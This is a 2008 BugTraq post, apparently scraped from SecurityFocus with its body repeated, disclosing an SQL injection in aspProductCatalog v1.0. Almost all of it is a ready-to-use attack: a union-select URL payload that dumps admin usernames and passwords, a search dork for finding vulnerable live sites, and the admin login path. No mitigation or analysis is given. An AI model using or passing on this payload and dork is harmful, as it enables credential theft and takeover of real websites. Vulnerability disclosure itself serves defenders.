BugTraq
Back to list
|
Post reply
aspProductCatalog Sql Injection
Dec 11 2008 06:21AM
r3d w0rm yahoo com
########################################################################
#############
#### aspProductCatalog Sql Injection ####
########################################################################
#############
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi #
########################################################################
#############
# #
#Download : http://heanet.dl.sourceforge.net/sourceforge/aspprocatalog/aspProductCat
alogv1.0.zip
# #
#DORK : "Powered by ASP Product Catalog" inurl:default.asp #
# #
########################################################################
#############
# [Sql Injection] #
# #
#http://Site/default.asp?cid=-999 union select 0,user_id,password,3,4,5 from admin #
# #
########################################################################
#############
# [Admin Panel] #
# #
#http://Site/admin/login.asp #
# #
########################################################################
#############
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#############
#### aspProductCatalog Sql Injection ####
########################################################################
#############
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi #
########################################################################
#############
# #
#Download : http://heanet.dl.sourceforge.net/sourceforge/aspprocatalog/aspProductCat
alogv1.0.zip
# #
#DORK : "Powered by ASP Product Catalog" inurl:default.asp #
# #
########################################################################
#############
# [Sql Injection] #
# #
#http://Site/default.asp?cid=-999 union select 0,user_id,password,3,4,5 from admin #
# #
########################################################################
#############
# [Admin Panel] #
# #
#http://Site/admin/login.asp #
# #
########################################################################
#############
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################
[ reply ]